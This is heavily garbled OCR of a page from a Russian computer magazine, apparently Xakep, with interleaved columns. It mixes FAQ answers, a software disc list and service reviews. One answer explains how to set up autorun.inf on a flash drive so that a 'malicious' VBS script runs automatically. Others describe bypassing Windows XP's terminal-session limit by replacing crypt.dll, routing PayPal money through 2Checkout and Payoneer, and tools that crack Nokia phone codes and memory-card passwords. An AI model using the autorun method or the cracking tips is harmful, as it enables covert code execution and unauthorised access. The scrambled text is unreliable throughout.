димы тебе для оценки видимостисайта во всех А:Допустим,у тебя есть злонамеренный 6. Mootools - очень компактая jаvаsсгiрt-биб
поиско вых системах, а и ме н но: 5атниц. который ты планируешьзапуститьс лиотека Ihttp://mootools.net)
1. Индексы цитирования Яндекса - ТИЦ и помощью авторана С флешки. Для воплощения + быстрая
Google - РаgеRапk; своего плана в жизньдействуйследующим т компактная
поисковыми системами Яндекс, Рамблер, 1.СоздаЙ файл myfile vbs, в котором пропиши + много компонентов
5. Если на сайтебудутобнаруженысчетчики
Рамблер Тор 100, утилита соберет данные о 2. В авторан добавь следующие строки: 8. xajax - довольно распространенная и удоб
количестве посетителей и просмотренных ная [ IIp:Uwww.xajaxproject.or.g1
страниц за последние 7 дней. [AutoRun]
+ удобная
Если будутобнаружены счетчики статисти UseAutoPlay=l
+ есть поддержка всего и вся (языки и т д]
ческих систе~~ Тор. Mail.ru, Livеlntегпеt IRaxJ. open=myfile."bs
11. MochiКit - на любителя 11, t : Пlосl1ikit. своему аккаунту на 2Checkout'e и выв дить
соm/dО'v'mlоаd.htПll] оттуда деньги С внутреннего счета. Р бятам,
+ кроссбраузерность которые держат сервисы. тоже нужно
- тяжелая КОмиссии.
может быть причина? PayPal. ЗавесТVI счет можно и при вязать ~ нему меньшим геморроем, чем со связкой 2Checkout
А, Обычно, всяческие парсеры съедают просто кредитную карточку - тоже. Но использовать и Рауопеег,
случае - это поиграться С настройками рhр.IПI. мать платежи И тем более обнаЛИЧVlтьденьги кию», Ка кзто лучше САелать?
нельзя При попытеe отправить платеж на такой А,Любой опытный настройщик тебе OTBeTVIТ
default_socket_tirneout = БОа (время аккаунт выдается ошибка о том, что адресат одно - воспользоваться СВЯЗКОЙ РhоеПIХ и JAF,
отва.лива.ния сокета по таймауту) принимать платежи не может. На русский Это лучшие сервисные программы для Inepel
mах_ехесutiоп_timе = 300000 (мак пей пал нельзя зачVlСЛИТЬ деньги даже со своей прошивки, настройки итестирования телефо
СИl'1альное время выпQлне:н::ин ск.рипта f собственной карты. Все платежи с русского нов Nokia. На форуме httD:Шогum,аllпоklа ru/
ставь по вкусу) пей пела проходяттранзитом, снимаются vle\'Vlopic phD?t~44556 можно скачать готовые
rnax_input_time = БОа (максимальное деньги с карты и после этого мгновенно, без сборки со следующими возможностями:
время для загрузки данных скрип~'ом) заЧVlсления на пейпел, уходят в магазин. В • Прошивка телефона в Normal и Dead - режи
mеmоry_liщit = 25БМ (если не жалко общем, ситуация - труба. мах (РtlОеПIХ, JAF];
операТИВi~ОЙ памяти, ставь побольще) Hol Есть обходные пути. Плюс в том, что • Dоwпgгаdiпg - откат на более раннюю вер
они есть в принципе, а минус - в том, что сию прошивки IJAF];
В целом же, все настройки РНР зависятот их использование требует дополнительных • Phoenix Вгоwsег - просмотр И работа со
ширины канала, так чтолучший опыт- это затрат Один из основных вариантов принять !скрытыми] папками и файлами втелефоне
эксперимент. платеж через пейпал для русских - получить [Phoenixl;
аккаунтvепdог'а на сервисе 2Checkoul C0I11. • MobiMB Browser - работа через USB,
О: Как использовать обычный Windows ХР в Это - специальный сервисдля людей, ко 8luetooth,IrDa со !скрытымиl папкамVI И файла
,качестветерм"нальногосервера Iterminal торые занимаются коммерцией винтернете, ми IMobiMBI;
serverl? предоставляет "М виртуальную площадку для • Закачка прошивокдля любого телефона и
А, Не все знают, но на самом деле любая версия торговли и систему для приема оплаты това продукт-кода прямо с серверов Nokia [РhоеПIХ)
ХР !как РгоfеSSlOпаl,так и Нотеl уже содержат ров. Зарегистрировав aK~aYHT на 2CI1eckout, • Полноценная работа с Producl Profile через
в себе терминальныйсервер, позволяющий пользователь получает в системе счетс '_ppu [Рhоепiх)
получитьудаленный рабочий стол по RPD. виртуальными деньгами, на который теперь • Format С - форматирование внутренней
Этот сервер искусственно огранич ен одн и м будут переводиться деньги с проведенных им памяти телефона без перепрошивки [Phoenix,
подключением, при этом локальный рабочий продаж. Фишка в том, ЧТО помимо платежей JAF]
стол блокируется Впрочем, умельцы давно на по кредитным картам (что тоже неплохо l ) и • Простое сохранение и восстановление на
шли решение того, как это глупое ограничение прочих видов оплаты, пользователи могут ис строек Product ProflLe через ',рр [РhоеПIХ, JAF};
обойти Утилита TS-Free - это, пожалуй, самый пользовать PayPal- и денежки с такого пла • Сохранение, восстановление, редактиро
распространенный хак, о КОТОром мы уже писа тежа попадут на внутренний счет 2Checkout. А вание телефонной книги через Рr10пеЬооk.tхt
ли Про грамма заменяет библиотеку cгypt.dLL на уже откуда их можно вывести l [Phoenlx)
вариант из бета-версиVl дистрибутива ко второ В результате имеем простую схему. Получа • Сохранение, восстановление Permanent
му сервис паку 'где ограничение на количество ем аккаунт вендора на 2Checkout Iзто стоит Метогу IРМ] телефона или отдельныхблоков
сеансов отсутствует). По такому же принципу $49], далее создаем некий 'говар (например, [PllOenlX, JAF];
действуеттулза ТеГПllsегv_ХРSР2j386. Чуть дизайнi, который нужно выложить на своей • Смена продукт-кода [РhоепiХ,JАF);
более навороченные возможности предлагает торговой странице, и передаем линкдля • Вскрытие защитного кода телефона IJAF,
программа ХРUпllmitеd [V\I\N'N.xDunlimited,corn), оплаты нашему ~лиенту Тот про изводит Nokla U п lockerJ;
у которой есть как платная, так И бесплатная оплату - 11, ву-а-ля, деньги оказываются на • Вскрытие пароля карты памяти [Nokia
ва риаци и, ОДНОЙ из фич явл яется SSL Gateway, ВНУ'греннем счету чекаута. Теперь следую Unlocker);
ПОЗВОЛЯЮЩИЙ осуществить RPD-коннект щий вопрос - как их оттуда вывести? Боль • Снятие скриншотов с экрана телефона, в том
поверх защищенного соеДVlнения. WinConnect шинство матерых фрилансеров рекомендуют числе сjаvа-игр ИJаvа-приложений IPhoenix);
Seгver ХР lWV'iW.еflЛJ/sоfl/wiпсоппесtsегvеГХD/ завести бан~овскую карточку на специ • Множество других настроектелефона, до
index.htmJ является полноценной реализацией альном сервисе Рауопеег [www.payoneer-. ступных на вкладке Теstiпg IРhоепiх);
терминального сервиса, но, увы, стоит денег_ ,:omJ. Это настоящая пластиковая карта, • Новые «горячие клавиши» в Phoenix: F5
Раз уж мы заговорили отерминальном сервере, которая после оформления придет по почте, Normal Mode, F6- Local Mode. F7 - Test Mode,:JC
ОАЕМОМ Tool. lit1! 4.30.3 Аwазu 2.4 F,eeCAO 0.7 1.••Tube Oovrnlosde,. 1.8
OownJoad Mssl., 5.5.11.1187 C/o,.loop Free"88k 0.3.0
FerPowerP.;t 1.15 0'091. Ch,om. 3.0.182.2 Вв!а Fllnlka 0.5.1 >Securit,
Flle~~.3.2.4.1 Ko,lo WlnRo,l. Firow.llб.б.О keyTo••h 2.4.1 ~uSec4.21
К·Ша Меоо Codoc Pa.k 4.80 ~Meln Free 4.0.784 K'd31.2 МШ'·9.11
Ml"nds 1М 0.7.19 Ma.thon B,ow,e, 2.5.1 KOHI •• ~,.O.O Fwsnort 1.0.8 ww·w.xakep.ru
Mo,llla FI,ofo. 3.0.1 О myib;YT.o.40 LiYES 0.9.9.8 КеоРшХ 0.4.0
Hotopad++ 5.3.1 NolC,"nch 5.2 ~.!!:!'!1!P 0.1.2 Моllllпjесtо,о.з
~rаg.б4 О,Ы! Oownlooder 2.8.11 Op.nXMLYiowor 1.0 OneSlxtj O'!!JI. 3•2 /,.m,)I,nd
Pum 0.80 Pid9in 2.5.б PorkbIn.!1d. Itl·ltlnmedla
~
QIP Inll,m ИС4 8.ild 9030 Р,; 0.12.1 QPOFMe'go 1.0 ~lm:.L.~ ;=~
Щро 4.04.0 Rom,to Pro.esв E.plorer 2.0.0.1 g Rem,,, 0.0.2 ~.mural
~-~
0.5
Тоtзl Command" 7.04. ~'y'p~-'O! Windows 4.1.0 sMPlaye, 0.5.7 5а,а 7.0.4
"
~~
Unlocka, 1.8.7 twhi,10.9.2 Suboonl.3.5 Sshutou! 1.0.5
Xokop СО Оаt.Sаш 5.2 UllroSu,[ 9.4 ,СНМ 1.16
;;~:
Th!.n.1 4.21
ХпУ!е. 1.9б ~~.c.mXP 5.3.4.118 TL5Wrsp 1.04
_~O
-....0
!Ч!l!Щ.1.1
~~Copi"5.1 !pdI3.02 T.!."OCryPt б.2 .~---11I
--~
a~
,Oe,elopment WinlDl
Adobe Rash Cal.ly.t 1.0 Bota ,Оеуоl >Server
HeldlSQL 4.0 ,50c"'i!, ~oO.4.4 Abyss W!!.!!,,,, Х1 2.6
HtlpWotoh B..lc Edl!lo I1JJ.J.L-. ElШ'IрI2.9.0
Clojure 1.0 Апотоп ОНСР ,о"а! 0.4
!!Ш!.~!ffiJ> 5.3.2 M"lti Password Иесо,еry IМРИ)
011I"00.3.3 AOlso"or 4.5.1
Micro,oH Web Platlo,m In'lalle, 1.1.5 ~.!!>0Ikl!I.3.1 Asto,isk 1-:-6.1--:0
2.08ata 5ру М..,аое 1.0.0.0 GiftW,ap 0.1 ЮаЬЬеrd 2.0.5
..
йтт tЕd 5.23 ш.~ry.Ptб.2 CSQL 0.2.1 I,a"o,d 2.5.5
Hiphl;l!ht 2.9 Ma,aDNS 1.3.01.09
>Games ,Sys!em .ill.!!IJI.dale14 Мo.toydO.9.2
And Уеl 1I Моуе. Oemo 1.0.3 #п Wlndow. 0.8.0 Klo.e 2.2.0 MyONS1M
COo"В0i4т'Г ЗОР СЫр 9.05 Коmрш, 0.7.10 !O!.nIO.I.S9
WinServe 12~ЛЗ
Pa.kj 2009·05·08 VoJd11 0.2.0
dоРОFб.2 WI11100 '.3 Кt,аН;сапаl,-,е, 0.4.0·' ,X·di,I,
liгJ 8-800-100-Ш2
IIpd.lr.
Cl'>9os~ tr,~ (1Ie ус;.о W8"1'1O trrp Sh4let>ee ""II'~I:~ ~~& jll: t~ L"~.ore cft~el.!<l1er'ilalUlatк! ..... ~
oMnear.dllpk!a~i8lSh8rtt>er. Uveralflella'li1!j18!I'IIDES. D~ 'e~'~ ,r.t! up:llkd W!I~P Р~~бf~.
About Sharebee: !.'!(J PJeaw _МБУ:; use If:e $flaret;e;;; l,'nK [О 8\'D:d ce;~o.'J, VII'1 COtr1ore /hellju;: UDfoaa.
Тhank you 1ог u,lпg our eervlce! ShoгeblE!O СОПl r. 811)0% free service.
'l'our li!als ПOV, being I,Ip[oa(l8<l~
"" 'mC-S~l::n(.оt27К6isес~~~КDl2.3tl1.19
~_n~
Миллион ресурсов позволяет вести списки дел, составлять календарь сразу на несколько файлообменникови выдает готовые линки на скачку.
и создавать разл и чные заметки, Но этот умопомрачительн ы й сервис Теперь можно быть уверенным. что файл не сотрут, а все желающие С макси
уделал всех' Теперь записать идею, добавить событие в календарь или, мальным удобством смогут его скачать.
[;i1teiCorpQrдtjМ---' -'-IООd~ОЬ71
InteJ corporaoon @[j]G0[J)@
IШШТ1тгtrптm тп 11'IIТI
!1~t'~1 cO!"J'.~a!lon 1:000"092
jlnte,' co.~poretlo.~_ ;ioOaaOJ.
rr;tё; (orpor~tiOfJ ~О~аз~Ю
~~-n--@.o902i
!~~~;00207b'
Iln_teJ corpor'!ltilln - jOOOe9_c; ВЫЯСНЯЕМ ПРОИ3ВОДИ 26%
I'n~el corporat1on
~e' corpor~tlQn
I<;IO.Oc:fl
[Offii7ё9' ТЕЛЯ УСТРОЙСТВА ПО ЕГО na.:an~la. псдa,:r,!tЖ1l. ПРСI~еQДIfТСЯ noepelltOДLfPOi8
СlраниЦ';'1
ф8linl. Не оБНОlilV:йrое
![~~~CCQIR~~JJ9n М--[ООО42З'
[Intet соrроГМiOn---!ОООЗ47 МАС-АДРЕСУ
!I,:,~~I t:Q(po~ti~~ :ООО2ЬЗ
J!n~~ .corpO(iI~ron.· hr.!::о<?,IОЯ~J?~~
,~
FINDAMAC ~
•
Этот сайт представляет собой базу данных по производителям сетевого
оборудования и их идентификаторам в МАС-адресе устройств, Первые 6
Сервис для перекодироваНИf18идеов формат, удобный для просмотра на
мобильных устройствах. Понятно, что зака чи вать 700 Мб фа йл с фильмом